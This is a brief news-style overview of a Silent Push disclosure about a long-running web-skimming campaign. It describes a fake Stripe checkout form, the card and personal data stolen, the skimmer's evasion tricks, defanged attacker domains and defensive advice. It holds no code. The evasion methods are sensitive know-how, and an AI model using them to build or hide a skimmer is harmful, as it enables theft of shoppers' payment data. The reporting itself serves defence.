Overview
- Silent Push disclosed that a covert web‑skimming operation has operated since January 2022 and remains active.
- The malware replaces checkout with a fake Stripe‑styled form, captures full card details plus names, emails, phone numbers and addresses, then restores the legitimate page after an error prompt.
- The skimmer avoids detection by self‑destructing when the WordPress admin bar is present, firing on DOM changes, and using a wc_cart_hash flag to prevent re‑skimming a victim.
- Obfuscated payloads are served from innocuous‑looking domains such as cdn-cookie[.]com hosted by a bulletproof provider tied to Stark Industries/PQ.Hosting, with exfiltration reported to lasorie[.]com.
- Targets include customers of American Express, Diners Club, Discover, JCB, Mastercard and UnionPay, and researchers urge CSPs, rigorous updates and MFA for merchants plus vigilant statement monitoring for users.